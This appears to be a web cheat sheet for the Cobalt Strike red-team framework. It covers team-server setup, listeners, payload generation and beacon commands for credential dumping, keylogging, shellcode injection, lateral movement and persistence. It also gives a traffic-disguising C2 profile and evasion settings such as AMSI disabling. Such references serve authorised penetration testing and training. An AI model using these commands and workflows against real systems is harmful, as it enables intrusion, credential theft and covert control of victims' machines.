コンテンツにスキップ

Cobalt Strike Cheat Sheet

Overview

Cobalt Strike is a commercial penetration testing and red team operations platform designed to emulate advanced threat actors. It provides a post-exploitation framework that allows operators to deploy beacons (agents) on compromised systems, establish command and control (C2) channels, and perform various offensive security operations.

⚠️ Warning: Cobalt Strike is a commercial security testing tool that should only be used in environments where you have explicit permission to do so.

Core Components

Team Server

  • Central command and control server
  • Runs on Linux
  • Manages beacons and listeners
  • Provides collaboration for team operations

Client

  • Java-based GUI application
  • Connects to Team Server
  • Interface for operators to interact with beacons
  • Visualizes target networks

Beacon

  • Primary payload for post-exploitation
  • Establishes communication with Team Server
  • Provides various capabilities for offensive operations
  • Can operate in different communication modes

Setup and Configuration

Team Server Setup

# Start the Team Server
./teamserver <ip_address> <password> [malleable_c2_profile]

# Example
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile

Client Setup

1. Launch the Cobalt Strike client
2. Connect > New Connection
3. Enter Team Server details:
   - Host: <team_server_ip>
   - Port: 50050 (default)
   - User: <username>
   - Password: <password>
4. Verify SSL certificate fingerprint

Listeners

Creating Listeners

1. Cobalt Strike > Listeners
2. Click "Add"
3. Configure listener settings:
   - Name: <listener_name>
   - Payload: <beacon_type>
   - Host: <callback_domain_or_ip>
   - Port: <port_number>
   - Profile: <malleable_c2_profile>
4. Click "Save"

Listener Types

Type Description
HTTP Uses HTTP for C2 communication
HTTPS Uses HTTPS for C2 communication
DNS Uses DNS queries for stealthy C2
SMB Uses named pipes for peer-to-peer C2
TCP Uses direct TCP connections
Foreign Integrates with other C2 frameworks

Payload Generation

Beacon Payload Types

Attacks > Packages > <payload_type>
Payload Type Description
Windows Executable Standard .exe file
Windows Service EXE Service executable
DLL Dynamic Link Library
PowerShell PowerShell one-liner
Python Python script
Office Macro Macro for Office documents
Shellcode Raw shellcode

Artifact Kit

Attacks > Packages > Windows Executable (S)
  • Generates custom payloads with evasion techniques
  • Modifies signatures to avoid detection
  • Customizable templates

Beacon Commands

Session Management

Command Description
help Display help information
sleep [seconds] [jitter%] Set sleep time and jitter
checkin Force immediate check-in
exit Terminate the beacon session
clear Clear the beacon's task queue
jobs List running jobs
jobkill [JID] Kill a running job
mode dns Switch to DNS mode
mode dns-txt Switch to DNS-TXT mode
mode dns6 Switch to DNS6 mode
mode http Switch to HTTP mode
mode smb Switch to SMB mode

Information Gathering

Command Description
hostname Get the hostname
ipconfig Display network configuration
netstat Display network connections
ps List running processes
tasklist Alternative to ps
getuid Get current user ID
whoami Get detailed user information
pwd Print working directory
drives List available drives
dir [directory] List files in directory
ls [directory] Alternative to dir
net [command] Execute net command
reg query [path] Query registry
sysinfo Get system information

File Operations

Command Description
cd [directory] Change directory
cp [source] [destination] Copy a file
mkdir [directory] Create a directory
mv [source] [destination] Move or rename a file
rm [file] Delete a file
rmdir [directory] Delete a directory
cat [file] Display file contents
download [file] Download a file from target
upload [file] Upload a file to target
timestomp [file] [template] Modify file timestamps
ls-acl [file] List file permissions

Process Operations

Command Description
execute [program] Execute without capturing output
shell [command] Execute and capture output
run [program] Execute a program
runas [user] [password] [program] Execute as another user
pth [user] [domain] [hash] Pass-the-hash to create a token
steal_token [pid] Steal token from process
make_token [domain] [user] [password] Create a token
rev2self Revert to original token
getprivs Enable system privileges
getsystem Attempt to get SYSTEM privileges
execute-assembly [file.exe] Execute .NET assembly in memory
powerpick [command] Execute PowerShell without powershell.exe
powershell [command] Execute PowerShell command
psinject [pid] [command] Execute PowerShell in specific process
shinject [pid] [arch] [file.bin] Inject shellcode into process
dllinject [pid] [file.dll] Inject DLL into process
dllload [file.dll] Load DLL in beacon process

Lateral Movement

Command Description
psexec [target] [listener] Use PsExec to deploy beacon
psexec_psh [target] [listener] Use PsExec with PowerShell
winrm [target] [listener] Use WinRM to deploy beacon
wmi [target] [listener] Use WMI to deploy beacon
ssh [target:port] [user] [pass] [listener] Use SSH to deploy beacon
ssh-key [target:port] [user] [key] [listener] Use SSH with key authentication
dcsync [domain] [user] Use DCSync to extract password hashes
jump [method] [target] [listener] Jump to target using specified method
remote-exec [method] [target] [command] Execute command on remote system

Pivoting

Command Description
rportfwd [bind port] [forward host] [forward port] Set up reverse port forward
rportfwd stop [bind port] Stop reverse port forward
socks [port] Start SOCKS proxy server
socks stop Stop SOCKS proxy server
spunnel [host] [port] Create encrypted tunnel over SMB
spunnel stop Stop encrypted tunnel
covertvpn [interface] [IP/Mask] Deploy Covert VPN interface
covertvpn stop Stop Covert VPN
pivot [host] [port] List pivot listeners
pivotlistener [host] [port] Create pivot listener

Post-Exploitation

Command Description
mimikatz [command] Execute Mimikatz command
hashdump Dump password hashes
logonpasswords Dump credentials from memory
keylogger [pid] Start keylogger
screenshot [pid] Take screenshot
screenwatch [pid] Watch target's screen
printscreen Take screenshot using PrintScreen
reg query [path] Query registry
powerview [command] Execute PowerView command
portscan [targets] [ports] [discovery method] Scan for open ports
browserpivot [pid] [port] Hijack authenticated web sessions
chromedump Dump Chrome cookies and login data
persist [method] [listener] Set up persistence
elevate [exploit] [listener] Attempt privilege escalation

Malleable C2 Profiles

Basic Structure

# Global options
set sleeptime "5000";
set jitter "10";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";

# HTTP staging
http-stager \\\\{
    set uri "/jquery-3.3.1.min.js";
    client \\\\{
        header "Accept" "text/javascript, application/javascript, */*";
    \\\\}
    server \\\\{
        header "Content-Type" "application/javascript";
    \\\\}
\\\\}

# HTTP client
http-get \\\\{
    set uri "/api/v1/data";
    client \\\\{
        header "Accept" "application/json";
        metadata \\\\{
            base64;
            prepend "session=";
            append ";";
            header "Cookie";
        \\\\}
    \\\\}
    server \\\\{
        header "Content-Type" "application/json";
        output \\\\{
            json \\\\{
                "status" "success";
                "data" "";
            \\\\}
            prepend "\\\\{\"data\":\"";
            append "\"\\\\}";
            base64;
        \\\\}
    \\\\}
\\\\}

Testing Profiles

# Verify profile syntax
./c2lint c2-profiles/normal/amazon.profile

# Start Team Server with profile
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile

Aggressor Scripts

Basic Script Structure

# Event handlers
on beacon_initial \\\\{
    println("New beacon: " . $1);
\\\\}

# Aliases (custom commands)
alias hello \\\\{
    blog($1, "Hello, World!");
\\\\}

# Menus
popup beacon_bottom \\\\{
    item "Custom Command" \\\\{
        blog($1, "Executing custom command...");
        bshell($1, "whoami");
    \\\\}
\\\\}

# Functions
sub get_system_info \\\\{
    bshell($1, "systeminfo");
\\\\}

Common Script Functions

Function Description
blog($1, "message") Write to beacon console
bshell($1, "command") Execute shell command
bpowershell($1, "command") Execute PowerShell command
bpowerpick($1, "command") Execute PowerShell without powershell.exe
bexecute_assembly($1, "/path/to/file.exe") Execute .NET assembly
bdllspawn($1, "/path/to/file.dll") Inject Reflective DLL
bpsexec($1, "target", "listener") Execute PsExec lateral movement
bwmi($1, "target", "listener") Execute WMI lateral movement
bwinrm($1, "target", "listener") Execute WinRM lateral movement

OPSEC Considerations

Process Injection

# Set parent process for new processes
ppid [pid]

# Set process to spawn for post-ex jobs
spawnto x64 %windir%\\sysnative\\rundll32.exe
spawnto x86 %windir%\\syswow64\\rundll32.exe

# Mask command-line arguments
argue [command] [fake arguments]

# Block non-Microsoft DLLs
blockdlls start
blockdlls stop

Evasion Techniques

# Obfuscate beacon in memory
sleep_mask [seconds] [jitter%]

# Configure staging process
stage \\\\{
    set obfuscate "true";
    set stomppe "true";
    set cleanup "true";
\\\\}

# Disable AMSI
amsi_disable

# Use smarter process injection
smartinject

Common Workflows

Initial Access

1. Create a listener (Cobalt Strike > Listeners)
2. Generate a payload (Attacks > Packages)
3. Deliver payload to target
4. Wait for beacon check-in

Privilege Escalation

1. Check current privileges: getuid
2. Attempt to get SYSTEM: getsystem
3. If unsuccessful, try specific exploits: elevate [exploit] [listener]
4. Verify new privileges: getuid

Credential Harvesting

1. Dump hashes: hashdump
2. Dump credentials from memory: logonpasswords
3. Use Mimikatz for advanced options: mimikatz [command]
4. Extract domain hashes (if DC): dcsync [domain] [user]

Lateral Movement

1. Identify targets: net view
2. Choose lateral movement technique:
   - psexec [target] [listener]
   - winrm [target] [listener]
   - wmi [target] [listener]
3. Verify new beacon check-in

Persistence

1. Choose persistence method:
   - persist [method] [listener]
   - schtasks [options]
   - service [options]
   - registry [options]
2. Verify persistence works
3. Document persistence mechanisms for cleanup

Resources